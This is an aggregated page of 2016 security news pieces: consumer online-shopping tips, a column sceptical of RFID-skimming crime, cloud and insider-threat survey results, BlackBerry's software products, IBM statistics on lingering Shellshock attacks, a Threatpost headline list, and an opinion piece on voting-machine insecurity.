still

Security remains top of mind as over 70 per cent of consumers noted they always think about their security/privacy when shopping online, according to Centrify. Unfortunately, despite the changing attitudes towards security, some consumers are still making basic security faux pas online.

security faux pas

Password hygiene is also a continuing problem when shopping online. Nearly 14 per cent admitted that they share passwords with friends and family so they can login to their accounts, whilst over 50 per cent said they save them to the retailer’s websites so as not to forget them. Over half also said that they only sometimes use different passwords for different retailer’s websites.

Most concerning is that one in eight said they would accept discounts and special offers from retailers in exchange for their passwords, highlighting the risks consumers are willing to take in order to save money online.

83 per cent would sometimes, or never, check the security and privacy terms and conditions of the retailer, leaving them wide open to hacking and data theft if shopping with an unknown or untrusted retailer.

On top of this, more than a fifth would still not ensure there is a secure padlock icon in the browser before making their purchases, and 27 per cent said they would only do this on some occasions.

With Black Friday around the corner and the Christmas shopping season well under way for most, frugal shoppers need to consider their online safety before making any purchases.

Centrify offers ten tips for consumers when shopping online:

  • Always shop with reputable sellers, and be cautious when entering URLs. A misspelled domain, or non-‘https’ site could land you on a false site designed to steal your information
  • Ensure you read the site’s privacy policy to understand how and where your personal information is being used. Lack of an easily visible privacy policy should be a red flag to using that site
  • Be suspicious of links in unsolicited emails – always type the link directly into your browser, do not click on them within the email. Hovering over the links should highlight if the link is unsafe, as you would notice the link underneath may be different to the text
  • Deals that appear too good to be true often are, so treat them with even more caution
  • If an online retailer requests extra personal information, such as a password for your email or bank account as part of the shopping process, do not enter them
  • Secure mobile phones if you plan to use them for shopping by enabling security features such as passwords and encryption
  • Always use different, long, and complex passwords (or passphrases) for each site. If you don’t, and a hacker steals your password for one account they will have free rein over the others! This would have devastating consequences on sites that have your personal and credit card information
  • Enable multi-factor authentication where possible. This involves combining two or more different ‘factors’ for extra security when logging in – such as something an individual has (like an ATM card or smart card), something a user is (such as a biometric characteristic like a fingerprint or retina scan) or something the user knows, like a password
  • Passwords are not meant to be shared. Never give out your passwords online, on the phone or even to friends or family
  • Do not store passwords. Many browsers, programs, or web applications will offer to store your password for you so you only have to enter the password once and never again. While seemingly a convenient option, it is a bad idea to store passwords associated with personal or financial accounts. This is especially true if you use public or shared computers.


Help Net Security

Back in January, I wrote one of my most popular posts ever: “Why you don’t need an RFID-blocking wallet.” As the title suggests, I argued that it’s a waste of money to buy a wallet with special shielding to protect your chipped credit card from RFID scanners wielded by street criminals seeking to snatch your credit card number.

Since then, in true internet tradition, I’ve been called an idiot by dozens of people and received emails from RFID vendors saying I’m a disgrace—the latter begging me to tell people they also need a Faraday bag for their cellphones. (Tip: If you don’t want anyone tracking you via GPS, turn off your cellphone’s GPS feature.) I’ve also been emailed by people who are 100 percent sure, without any real evidence, that they were the victims of RFID-scanning criminals.

[ Why you don’t need an RFID-blocking wallet. | Watch out for 11 signs you’ve been hacked—and learn how to fight back, in InfoWorld’s PDF special report. | Discover how to secure your systems with InfoWorld’s Security Report newsletter. ]

Part of the confusion stems from the fact that many, if not most, people now have chip-and-pin cards—you can see the shiny chip right on the card, which you stick into a card reader (instead of sliding the card through). People assume chip-and-pin cards are vulnerable to scanning, but they’re not. RFID cards are contactless—and very likely you don’t have one.

Still waiting

Every story about the risks of RFID scanners features a white hat hacker showing it can be done, but not a shred of evidence has emerged that bad guys are sitting on popular corners wirelessly stealing credit card numbers.

I still haven’t heard of a single case of real-life RFID scanning criminality. Even the wallet vendors’ websites have no verifiable links or testimonies from actual victims. To be honest, at this point, I’m surprised an RFID-protection vendor hasn’t paid a criminal to get caught, so they could point to a real-life story.

Plenty of “believers” have told me it’s obvious why the real RFID scanning criminals haven’t been caught yet—it’s a wireless crime. In their world, it’s impossible to catch wireless criminals. Never mind that we’ve been successfully tracking criminals wirelessly and prosecuting them for decades. If there were a huge contingent of RFID criminals, we would eventually catch some, and it would be such big news that it would spread like wildfire across the internet.

If someone stole a credit card number using an RFID scanner, created a counterfeit card, and got busted, as part of the plea agreement the accused would reveal exactly how the crime had been committed. This plea would have details about the scanner, the victims, and how much money had been stolen. That’s how our justice system works. Where are those stories?

Even the popular debunking website Snopes.com has commented on RFID crime, giving it a “Mixture” truth rating. Why “Mixture”? Because it can’t find any real evidence RFID theft is occurring, although it debunks at least one news source that claimed to show a real RFID criminal.

Make no mistake—criminals who want to make money know about this supposedly easy crime. Hacker researchers have been writing about the risks since RFID-enabled items first came out. Here’s an article from industry luminary Bruce Schneier from 2006.

Not cost efficient

Given all this, you might be surprised to learn I think that RFID-scanning criminals do exist. There are nearly 100 videos on the internet from all over the world showing good guy hackers demonstrating how it can be done. It’s a potential risk. But because the real-life occurrence is so rare, it’s a small risk.

Why? Because it’s not cost-efficient. Real-life criminals steal credit card numbers all the time, but they don’t sit on corners for hours hoping to catch a few dozen card numbers. They steal hundreds of thousands of cards and resell them for cheap to anyone who wants to buy them. In 10 minutes, any criminal with enough smarts to even know what RFID scanning is can spend a $ 100 to buy 1,000 credit card numbers off the internet from any number of illegal dealers, with far less risk of being captured on a security camera.

Focus on real threats

I have no problem with someone buying an RFID-protecting wallet or a Faraday bag for a cellphone or car keys. We all make our own risk and buying decisions on a daily basis. I’m just saying that for most people it doesn’t make much sense.

We’re each hit by a myriad of risks every day. In the computer world alone, we get introduced to somewhere around 13 to 16 new individual security vulnerabilities every day, year after year. They never stop coming.

A prudent person looks at the various risks, weighs the likelihood and potential damage of each of them against the other, and picks those to spend time and money on.

I use the example of people who visit me in Key Largo: Almost all of my visitors worry about potential shark attacks when we go snorkeling and diving. Some are so terrified they won’t get in the water. I tell them there has never been a documented, unprovoked shark attack in the history of Key Largo (at least since the 1800s, if not earlier). The risk of shark attacks worldwide is something like one in 1 million (70 to 100 deaths among hundreds of millions of potential encounters). But the odds that those same people might be killed by driving their car to my house are about 1 in 12,300. As humans, we are terrible at ranking risks, even when told the true odds.

Where I was wrong

I have one update to the original post: I said most of the credit cards in the world don’t have RFID in them. That’s still true. But in some countries, like Canada and Poland, RFID-enabled credit cards are the norm. Even in those countries, I can’t find reports of real RFID-scanning criminals.

Of course, cases of RFID-scanning criminals caught by police may simply have not made it to the web yet—but you’d think that the dozens of vendors selling RFID-protecting wallets and purses would be linking to those stories like crazy. Guess what? They haven’t.

Still, if I haven’t convinced you, go ahead and buy that RFID-protecting wallet. It’s your money and your risk decision. Me, I’ll wait until I hear that RFID crime is on the rise—or better yet, until I have an RFID-enabled credit card. Friends who have shown me their RFID wallets did so because their new credit cards came with a chip, which they assumed was RFID in nature. It wasn’t. They were carrying the regular, nonwireless, chip-and-pin cards.

To comment on this article and other InfoWorld content, visit InfoWorld's LinkedIn page, Facebook page and Twitter stream.


InfoWorld Security Adviser

Security and privacy of data and systems in the cloud remains a top worry for 70% of IT professionals worldwide, up from 63% in 2015, according to a new Cloud Security Survey by Netwrix. The top three cloud security concerns in 2016 are unauthorized access (69%), malware (37%) and denial of service (DoS) attacks (34%).

Cloud security concerns (up to 5)

hinder cloud adoption

Even though cloud service providers make security a top priority, cloud computing is still associated with a number of risks, including potential for unauthorized access by employees and third parties, sophisticated attacks, and lack of visibility into what is happening across cloud IT environments.

Netwrix asked more than 600 IT professionals from technology, government, healthcare, finance, manufacturing and other industries about their thoughts on security in the cloud, their readiness to adopt the technology and possible ways to ensure data protection.

Key survey findings

  • Cloud adoption rate has risen during the past year, from 43% of organizations in 2015 to 68% this year. However, only 8% of companies are ready to move their entire IT infrastructure to the cloud in the near future.
  • Security and data privacy is the top concern with cloud (70%) followed by loss of control over data (53%).
  • A hybrid cloud approach is preferred by 55% of organizations that are considering a cloud move; 40% of cloud users are already taking advantage of the hybrid model. This model enables them to balance costs, business benefits and data security.
  • The most common factors that hinder cloud adoption are insufficient security mechanisms (56%), high costs and small budgets (54%), and lack of compliance guarantees (39%).
  • The majority (61%) of respondents indicate that their own employees pose more risk to data security in the cloud than anyone else.
  • The overwhelming majority (95%) of respondents consider visibility into user activities in the cloud to be an important element in cloud providers’ security guarantees.

Cloud technology’s impact on security of IT infrastructure and data

hinder cloud adoption

“The 2016 survey has revealed that despite cloud providers trying hard to secure the cloud environments, the majority of IT pros are still not convinced that the technology is safe enough — mainly because of the insider threat. Lack of visibility is the primary reason why security remains the top cloud-related challenge for many organizations. Advanced security solutions and an integrated view of activities both in the cloud and on premises will help companies increase user accountability, detect insider threats faster and prevent data exfiltration, thus minimizing the damage from unauthorized or incorrect user actions,” said Alex Vovk, CEO and co-founder of Netwrix.


Help Net Security

CSO Online | Sep 29, 2016

In the latest episode of Security Sessions, CSO Editor-in-Chief Joan Goodchild speaks with Michael Bruemmer, vice president at Experian Data Breach Resolution, about a recent survey that said companies are unprepared to stop employee-caused data breaches.


InfoWorld Security

The only surprise in this week's announcement that BlackBerry is getting out of the hardware business is that it took this long. CEO John Chen has been hinting broadly for two years that this would happen, and the parade of unsuccessful Android smartphones that followed the parade of unsuccessful BlackBerry 10 OS smartphones pointed in only one direction: the death of hardware.

But BlackBerry was and is not simply a hardware company. Chen has spent considerable effort to transform it into a software company focused mainly on mobile security tools, but also a little on communications tools. Today, BlackBerry has a grab bag of technologies it's acquired to stake out that software claim.

[ InfoWorld's deep look: Why (and how) you should manage Windows 10 PCs like iPhones. | InfoWorld's Mobile Security Deep Dive: Download it today in your choice of PDF or ePub editions! ]

Here's which ones should matter to you and which ones shouldn't.

Good Secure EMM suites

IT has long known and used BlackBerry Enterprise Server (BES), which was renamed BlackBerry Enterprise Service when it was expanded to support iOS and Android in 2012 through the 2011 acquisition of Ubitexx. BES is now a component in the Good Secure EMM Suites, for which most of its components were obtained through another acquisition: Good Technology, in 2015.

Good is the sole significant survivor of the original, pre-iPhone enterprise mobility management (EMM) providers. Today, newcomers like MobileIron and AirWatch (bought by VMware a few years back) dominate the market, and Microsoft is trying to muscle in with its Enterprise Management Service product suite.

Like MobileIron and AirWatch, Good's suites support iOS, Android, Windows 10, and MacOS for what's called omnidevice management. Good also provides the option of wrapping custom applications with its proprietary APIs via the Good Dynamics tools to add security features not natively supported by the iOS and Android APIs; MobileIron and AirWatch offer similar mobile management extensions. And like MobileIron and AirWatch, the Good suites tie into identity management systems -- an essential connection for users entrusted with sensitive corporate data and workflows on both mobile and desktop devices.

Good has a long history in IT, and it remains a real contender for your EMM platform, especially if you've already invested in its tools.

WatchDox

There's a lot of noise lately around document management on mobile devices. Microsoft has one approach for Office 365, Apple has one for e-books in iOS, and every cloud storage vendor has tools to manage document access across devices.

WatchDox, purchased by BlackBerry in 2015, takes a heavy-handed approach, adding digital rights management to files to ensure they can be read and edited only by authorized users. That makes sense for truly critical documents, but it means your people are restricted to using only WatchDox apps for that content -- which may or may not make sense for specific documents and workflows.

WorkLife

Part of the Good product set BlackBerry acquired, this split-billing component tracks cellular data usage by Good Dynamics apps. Ostensibly, it helps IT manage cellular data costs in BYOD scenarios, but in practice, it does not.

That's because users work with many other off-the-shelf apps that don't call the proprietary Dynamics APIs, so their data usage isn't tracked. Besides, if you provide a fixed reimbursement for work use of BYOD items, there's no need to track cellular data for each person to figure out the relative billing balance.

AtHoc

Based on a 2015 acquisition, the AtHoc platform lets you manage crisis communications, such as sending automated messages to staff and others in case of a natural disaster, an unexpected building closure, a mass shooting, or even a meeting delay. AtHoc has no strong relationship to other BlackBerry services, so any decision around its use need not factor other BlackBerry relationships.

Secure messaging: SecuSmart and BBM Secure

BlackBerry bought SecuSmart in 2014 to offer encryption-secured calls and text messaging for Android and iOS smartphones. This was back when former NSA contractor Edward Snowden revealed the U.S. government was snooping on foreign leaders' calls, and governments started seeking a way to block the NSA.

SecuSmart works only on smartphones. Its text-messaging encryption is tied to a mobile phone number, so tablet-based messaging is protected only if it goes through a protected smartphone, such as if an iPad user is using Handoff to text via his or her iPhone.

BlackBerry also offers BBM Secure, which protects text messages on Android and iOS smartphones via the BlackBerry Messenger app. Its capabilities are similar to those of SecuSmart, and it's unclear why BlackBerry offers both options.

Again, note the limitation to smartphones. If you want to secure text messaging across all user devices, look elsewhere.

BlackBerry Messenger

Available for Android and iOS devices for several years now, BBM sought to take advantage of the popularity of the BlackBerry phone's beloved messaging service. It works OK, but if you have multiple devices, it's a pain to use because only one device can be active at a time -- not a restriction on the many other messaging apps available today. Plus, there's no desktop client.

If your concern is privacy, I'd go with Snowden's recommended Signal app instead, from Open Whisper Systems. If you want a great messaging app across all popular devices with good support for voice, text, and video, Signal fits the bill nicely, too.

Dtek for Android

Available for a small number of Android devices, Dtek lets users see what data various apps are monitoring and manage the permissions for each app. That sounds great, until you realize Android Marshmallow (and Nougat) does that natively, with no app needed. In iOS, of course, Apple has long provided this visibility and the controls over apps' use of your data.

BlackBerry Hub for Android

One of the few features in the BlackBerry 10 OS that users liked, the Hub is a central communications zone so that you don't have to switch among apps to handle your various communications channels. I found it overwhelming, but many others really like the Hub.

It's available for Android Marshmallow and later devices; an iOS version is supposedly in the works. BlackBerry Hub is certainly worth a try if you like the idea of a communications hub on your mobile device.

Miscellaneous Android apps

BlackBerry has made some features from its Priv and Dtek Android phones available to other Android devices (not to iOS). If you're the kind of person who likes to use a third-party app rather than the native clients, check them out at the Google Play Store (search for "BlackBerry").

In addition to the Dtek, BBM, and Hub apps already mentioned, the apps compatible with many Android devices include BlackBerry Contacts, BlackBerry Calendar, Tasks by BlackBerry, Notes by BlackBerry, BlackBerry Password Keeper, and BlackBerry Device Search.

Your guess is good as mine as to how long BlackBerry will continue to develop and support these apps.


InfoWorld Security

Ready for me to go old school? How about SQL Slammer-level old school? More than 13 years after it was first found scurrying around the internet, the SQL Slammer worm can still be found propagating in the wild, albeit minimally, according to IBM Managed Security Services (MSS) data.

But why does such an old threat keep making the rounds more than a decade after its discovery? Some older threats never die because they’re easy to exploit. There’s always the chance that a vulnerable system can be compromised by tested and true bugs.

Shellshock Surge

While SQL Slammer is a dated threat that only affected Microsoft SQL server 2000, we have much more serious and widespread threats following in its footsteps.

Last Saturday marked the two-year anniversary of one of the most infamous bugs of 2014, Shellshock. A recent surge in attacks observed by IBM Managed Security Services suggested the threat is still prevalent.

From Zero Day to Present Day

A 20-year-old vulnerability (CVE-2014-6271) in the GNU Bash shell, which is widely used on Linux, Solaris and Mac OS systems, sparked the mobilization of attacks known as Shellshock beginning in late September 2014. This first vulnerability gave way to the disclosure of several additional vulnerabilities affecting the UNIX Shell within a short period (CVE-2014-7186 and CVE-2014-7187), at which point many realized that this was a threat to be reckoned with.

Right at the onset, we observed a significant increase in focused attacks leveraging these vulnerabilities — over 2,000 security events within 24 hours of the Shellshock bug disclosure. To get an idea of the magnitude of this activity, there were just over 7,500 Shellshock security events for the entire month of August 2016, according to IBM MSS data.

When a zero-day vulnerability surfaces, especially a high-profile one that can affect many systems, the corresponding exploit is usually disclosed promptly. With Shellshock, an exploit targeting the first vulnerability was publicly disclosed a mere 28 hours after the zero-day vulnerability emerged.

As news of this vulnerability and its ease of exploitation spread, the number of attackers opting to leverage and exploit it increased tremendously. Attacks came in waves from different source IPs and originating countries, rising in quantity every hour.

Shocking Numbers

As though in anticipation of its anniversary, Shellshock attack activity recently surged to levels not seen since 2015. As of Sept. 22, the month of September accounted for more than 26 percent of the total activity recorded in 2016.

A little over 70 percent of the attack traffic originated in the U.S., whereas another 18 percent comes from Australia. Top targets of these attacks, according to IBM MSS data, include organizations located in U.S. (26 percent), Japan (18 percent), India (16 percent) and Brazil (11 percent).

Shellshock anniversary

Retrospective Perspective

Before Shellshock had us scrambling to patch our systems in 2014, we were running for the hills because of another vulnerability. Heartbleed, which affected OpenSSL, a popular open-source protocol, was all over the news.

Heartbleed enabled attackers to remotely exploit a vulnerability to read system memory contents without needing to log on and authenticate a valid identity to a remote server. Successful exploitation could allow attackers to retrieve private keys, passwords or other sensitive information from servers they were not authorized to access.

Shellshock 2

Although a formidable threat when it first surfaced — IBM MSS data revealed over 1.8 million Heartbleed-based attacks by the end of the first month — Heartbleed failed to exhibit the same staying power as its system-crippling cousin, Shellshock.

As shown in the figure above, in the past year, Heartbleed activity indeed paled in comparison to Shellshock, failing to reach even 15 percent of the total number of Shellshock attacks. Even as Shellshock attacks nosedived in November 2015 and continued to wane as we entered 2016, it still managed to maintain its stamina, averaging nearly 7,900 attacks per month throughout 2016.

Who Is Still Riding the Shellshock Wave?

Per IBM MSS data, as of mid-September, the U.S. is the leading country from which Shellshock attacks originate, making up 71 percent of the total in 2016. Approximately 1,800 unique source IPs based in the U.S. were responsible for these attacks. China is in a distant second, making up 8 percent of the Shellshock attacks, followed by Australia and Italy at 6 percent and 3 percent, respectively.

Shellshock 3

Who Is Still Suffering From Shellshock?

The U.S. is also the leading country in terms of organizations targeted by Shellshock, making up 46 percent of the total in 2016. Although Japan was at the top when the threat first materialized, it ranks second in 2016, making up 24 percent of the total on a global scale.

Shellshock 4

In terms of industries most targeted, the information and communication sector, including telecommunications companies as well as those that provide computer programming and consulting services, topped the list in 2016. They sustained over 46 percent of the Shellshock attacks. This makes sense since many major organizations in this space run Linux-based systems in their IT infrastructure and environments.

Shellshock 5

Financial services ranked second at 26 percent, followed closely by manufacturing in third at 16 percent. The finance sector began adopting Linux-based platforms over a decade ago, with early adopters including the Chicago Mercantile Exchange in 2004 and the New York Stock Exchange in 2007. The pervasiveness of the operating system in this sector makes it an attractive target.

UNIX systems, which employ the Bash shell, are also perhaps more prevalent in manufacturing versus other industries. ICS and SCADA hardware might also have a basic UNIX-like firmware running on the device that can’t be easily updated due to special constraints. That could lead to outdated vulnerable services such as SSH, OpenSSL and Apache running on critical devices.

Additionally, the large discrepancy in Shellshock activity observed in information and communications, financial services and manufacturing versus other industries may point to differences in patching practices among those verticals.

Make It Go Away

We wish we could wave a magic wand and make threats like Shellshock go away. But it’s not so simple, unfortunately. Like stains, some cyberthreats are persistently visible, and Shellshock seems bent on sticking around.

So how do you address this issue? Apply the appropriate update for your system. Failure to apply patches and fixes leaves your organization at risk of Shellshock attacks. Timely patch management is vital in organizations of any size. However, depending on the complexity of your environment, this is easier said than done.

Security intelligence and data analytics tools allow your organization to identify the greatest vulnerabilities and prioritize patching, keeping your systems patched and up to date. Virtual patch technology can provide an additional layer of protection. While vendor patches are a first line of defense, protocol analysis, which is incorporated in IBM Security Network Intrusion Prevention product offerings, can provide an additional layer to protect against these types of attacks. In fact, IBM has been helping to protect customers from Shellshock and similar attacks since 2007.

Let’s hope this upward trend is fleeting, and next year there won’t be any reason to publish an anniversary blog.

To learn more about other older attacks that are still successful, check out the white paper “Beware of Older Cyber Attacks.”

Read the White Paper to learn more about older attacks


Security Intelligence

Pokémon GO Spam, Ransomware, On the Rise

August 17, 2016 , 12:58 pm

Google Retreats on Some Allo Privacy Promises

September 21, 2016 , 2:13 pm

Experts Want Transparency From Government’s Vulnerabilities Equities Process

September 20, 2016 , 2:41 pm

Bruce Schneier on Probing Attacks Testing Core Internet Infrastructure

September 15, 2016 , 11:15 am

Generic OS X Malware Detection Method Explained

September 13, 2016 , 9:14 am

Patched Android Libutils Vulnerability Harkens Back to Stagefright

September 9, 2016 , 2:06 pm

Chrome to Label Some HTTP Sites ‘Not Secure’ in 2017

September 8, 2016 , 3:43 pm

Threatpost News Wrap, September 2, 2016

September 2, 2016 , 9:00 am

Insecure Redis Instances at Core of Attacks Against Linux Servers

September 1, 2016 , 1:08 pm

Dropbox Forces Password Reset for Older Users

August 29, 2016 , 9:58 am

Cisco Begins Patching Equation Group ASA Zero Day

August 24, 2016 , 5:53 pm

New Collision Attacks Against 3DES, Blowfish Allow for Cookie Decryption

August 24, 2016 , 8:00 am

Cisco Acknowledges ASA Zero Day Exposed by ShadowBrokers

August 17, 2016 , 4:06 pm

ProjectSauron APT On Par With Equation, Flame, Duqu

August 8, 2016 , 1:40 pm

Miller, Valasek Deliver Final Car Hacking Talk

August 4, 2016 , 3:26 pm

Researchers Go Inside a Business Email Compromise Scam

August 4, 2016 , 10:00 am

Export-Grade Crypto Patching Improves

August 3, 2016 , 10:00 am

Kaspersky Lab Launches Bug Bounty Program

August 2, 2016 , 9:00 am

Threatpost News Wrap, July 29, 2016

July 29, 2016 , 10:45 am

KeySniffer Vulnerability Opens Wireless Keyboards to Snooping

July 26, 2016 , 9:30 am

Upcoming Tor Design Battles Hidden Services Snooping

July 25, 2016 , 3:51 pm

EFF Files Lawsuit Challenging DMCA’s Restrictions on Security Researchers

July 21, 2016 , 1:18 pm

Oracle Patches Record 276 Vulnerabilities with July Critical Patch Update

July 20, 2016 , 9:21 am

Threatpost News Wrap, July 15, 2016

July 15, 2016 , 11:00 am

Academics Build Early-Warning Ransomware Detection System

July 14, 2016 , 1:05 pm

xDedic Hacked Server Market Resurfaces on Tor Domain

July 12, 2016 , 11:40 am

Conficker Used in New Wave of Hospital IoT Device Attacks

June 30, 2016 , 11:48 am

655,000 Healthcare Records Being Sold on Dark Web

June 28, 2016 , 10:00 am

Windows Zero Day Selling for $ 90,000

May 31, 2016 , 5:44 pm

Millions of Stolen MySpace, Tumblr Credentials Being Sold Online

May 31, 2016 , 1:37 pm

OTR Protocol Patched Against Remote Code Execution Flaw

March 10, 2016 , 10:23 am

New Gmail Alerts Warn of Unauthenticated Senders

August 11, 2016 , 2:10 pm

New Trojan SpyNote Installs Backdoor on Android Devices

July 29, 2016 , 12:21 pm

iSpy Keylogger Targets Passwords, Skype, Webcams

September 21, 2016 , 2:06 pm

Keystroke Recognition Uses Wi-Fi Signals To Snoop

August 25, 2016 , 2:19 pm

PLC-Blaster Worm Targets Industrial Control Systems

August 5, 2016 , 4:49 pm

Android Patch Fixes Nexus 5X Critical Vulnerability

September 2, 2016 , 12:49 pm

Critical MySQL Vulnerability Disclosed

September 12, 2016 , 11:00 am


Threatpost | The first stop for security news

People have trouble prioritizing risk. For example, you often hear about the threat of voter fraud, when all evidence suggests that the risks of such fraud are inconsequential. In truth, hacked voting machines are much more likely to affect an election’s outcome. 

Why would an election fraudster try to herd a flock of criminal participants to the polls when one mildly talented hacker could cause far more trouble?

[ An InfoWorld exclusive: Go inside a security operations center. | Discover how to secure your systems with InfoWorld's Security newsletter. ]

On a state-by-state level, most presidential elections are decided by many thousands of votes. For example, in 2012, Barack Obama beat Mitt Romney by more than 166,000 votes in the swing state of Ohio. Even in the 2000 election, the closest presidential contest ever, what sort of Houdini could have marshaled the miscreants necessary to cast a few hundred fake votes to tip the balance without getting caught? A hack of a single voting machine could accomplish the same objective.

The good news is that voting machines are not connected to the internet, so physical access is required to hack them. The bad news: If you can get to them, they're easy to hack.

Voting machines are dinosaurs

America’s voting machines include both old mechanical devices and voting computers, which tend to run old operating systems on unsupported, out-of-warranty laptops and servers. Today, approximately 70 percent of  U.S. voting sites use a voting computer.

It’s amazing how many voting computers still run Microsoft Windows XP, though Microsoft hasn’t supported it or offered critical security patches for years. According to the Brennan Center for Justice at New York University School of Law, 43 of our 50 states have voting computers that are at least 10 years old; 14 of those 43 states use voting computers that are 15 years old or more.

Most of the people in charge of protecting, configuring, updating, deploying, and supporting these devices lack the experience or troubleshooting skills of today’s average teenager. Few understand the security risks involved with the computers they manage.

All voting computers can be hacked

Most voting computer manufacturers (there are at least 15 vendors) believe white hat hacking is a menace. Proactive bug bounty programs do not exist. Only a few states require independent vulnerability audits.

Every independently audited voting computer has been shown to contain numerous, basic, easy-to-exploit vulnerabilities. A fresh report from the Institute for Critical Infrastructure Technology puts it succinctly: “Voter machines, technically, are so riddled with vulnerabilities that even an upstart script kiddie could wreak havoc.” In 2012, white hat hacker Roger Johnston explained to Popular Science how a voting computer’s votes could be changed for less than $ 10 worth of RadioShack hardware.

Well, at least such hacks require physical access. No one would consider connecting voting computers to the internet and making them exponentially more vulnerable. Right?

The internet voting peril

Wrong. Thirty-plus states and the District of Columbia already allow some votes to be submitted across the internet. More states want to experiment with internet voting. It’s simply a matter of time.

Scores of companies are lobbying for internet voting, including Simply Voting, which touts “flawless elections made simple.” Granted, I’m confident any system is hackable, but at least this vendor seems to understand some of the risks.

I don’t have to think long and hard to imagine a broad, client-side, man-in-the-middle attack, which could flip votes without the vendor or the voter being able to detect it. Sophisticated malware able to accomplish similar tasks, in the form of banking Trojans, has been around for more than a decade.

Keep the vote safe

I know of no independent computer security researcher with voting machine expertise who will tell you that computerized-voting is safe as it stands -- or recommends moving to internet-based voting. Read Bruce Schneier’s latest NSFW rant to get his take on the topic.

Lots of other organizations, such Verified Voting, are working hard to safeguard our current computerized voting experience. Verified Voting even lets you find out which voting computer or machine your voting precinct uses.

All voting computer experts agree that verified paper audit systems must be maintained to audit and spot-check a voter’s intent. Unfortunately, one quarter of our states don’t require paper trails -- and only 26 require post-election auditing verification.

Why is stealing elections so hard?

Hacking an electronic voting computer isn’t hard, but rigging an election is, mainly because physical access is necessary. Each physical hack adds to the risk of discovery, and you'd need to hit enough machines in the right places without detection to shift an election’s outcome.

Consider the 2000 presidential election. The incredibly tight outcome in Florida could not have been predicted. To swing any election, hackers would need to know who's going to the poll and how many votes would be necessary to offset the early, military, and absentee ballots (which often aren’t counted until after the election). That can’t be done with any level of accuracy.

In today’s world of ultrapolarized politics, where each side accuses the other of “rigging” elections, keeping our elections reliable and tamper-free is paramount. But I don’t think “election observers” and voter IDs will do it. Instead, we need paper trial auditing -- and we need to keep voting off the internet.


InfoWorld Security Adviser

Organizations globally believe they are their own worst enemy when it comes to cybersecurity, with 45 percent saying they are ill-equipped to cope with the threat of malicious insiders and twice as many, 90 percent, calling malicious insiders a major threat to the organizations’ security, according to Mimecast.

malicious insiders

“Companies’ IT security priorities usually change depending on different factors, among which the budget and the threat vectors are the most important for most. If last week Oracle’s POS breach was the most debated, most surely retailers using POS devices and all organizations working with financial data have started to check their own systems and to see how they can strengthen their security for that specific threat. In the light of such incidents, insiders threats are left out, so it is no wonder that 45 percent are ill-equipped to cope with malicious insiders,” Roman Foeckl, CEO at CoSoSys, told Help Net Security.

“It is also realistic that 90 percent of organizations see malicious insiders a major threat, but I would include here also negligent insiders. From our encounters with CSOs from organizations in different verticals, we noticed their fear is directed towards insiders in general, not necessarily malicious ones. In case of human error, there is the risk of people uploading sensitive files on unsanctioned applications, copying confidential information on cloud file sharing apps or making print screens of critical data and publishing it on unauthorized online services. Regardless if we’re talking about malicious or careless employees, to prevent data losses or thefts, businesses should define what data should be allowed or not to be transferred and through what channels, if it’s e-mail, instant messaging, cloud file sharing apps, or portable storage devices,” explains Foeckl.

Is your email security up to par?

Mimecast uncovered that 65 percent of IT security decision makers globally feel their email security systems are inadequately equipped to handle cyber threats.

By concentrating predominately on perimeter defense and outside threats, organizations around the world struggle with the risk that comes from their own people, emphasizing the need for organizations to implement employee awareness and education as well as creating a cyber resilience strategy that includes both technology- and human-based defenses. This is evident especially considering this study revealed that nearly half of the organizations polled felt exposed to malicious insider attacks.

The research also uncovered that:

  • Over half (53 percent) of IT security decision makers view malicious insiders as a moderate or high threat to their organization.
  • One in seven IT security decision makers view malicious insiders as their number one threat.
  • Those who say they’re very equipped on cybersecurity feel virtually just as vulnerable to insider
    threats as those who believe they aren’t equipped at all (16 percent vs. 17 percent), indicating that the risk of malicious insiders trumps perceptions of security confidence.

“It’s no surprise that even the most cyber-ready companies are terrified of insider threats. It was always possible for employees to steal or misplace valuable corporate data, but never this easy. Cloud services have facilitated the movement of data into and out of the enterprise like never before – which is both a great asset and risk to businesses,” says Andreas Zengel, EMEA CTO at Skyhigh Networks.

“Cloud services have vastly expanded the scope of insider threat. The most common insider threat scenarios – such as a salesperson jumping ship, rogue sys admins or simply employees committing security missteps in the process of doing their job – are all enabled by cloud computing, and much more difficult to detect due to the nature of modern business operations. With the vast amount of interactions with cloud services by each user every day, it is essential that enterprises put in controls and intelligent monitoring solutions that can filter out the noise of day-to-day usage from the activities performed by a malicious insider and pro-actively warn security operations and prevent actions when an anomaly or threat was detected,” Zengel concluded.

malicious insiders

Mimecast tips for safeguarding against malicious insiders

1. Assign role-based permissions to administrators to better control access to key systems and limit the ability of a malicious insider to act.

2. Implement internal safeguards and data exfiltration control to detect and mitigate the risk of malicious insiders when they do strike, to cut off their ability to send confidential data outside the network.

3. Offer creative employee security training programs that deter potential malicious insiders in the first place and help others to spot the signs so they can report inappropriate activity to their managers. Then, back that up with effective processes to police and act swiftly in the event of an attack.

4. Nurture a culture of communication within teams to help employees watch out for each other and step in when someone seems like they’ve become disenchanted or are at risk of turning against the company.

5. Train your organization’s leadership to communicate with employees to ensure open communication and awareness.


Help Net Security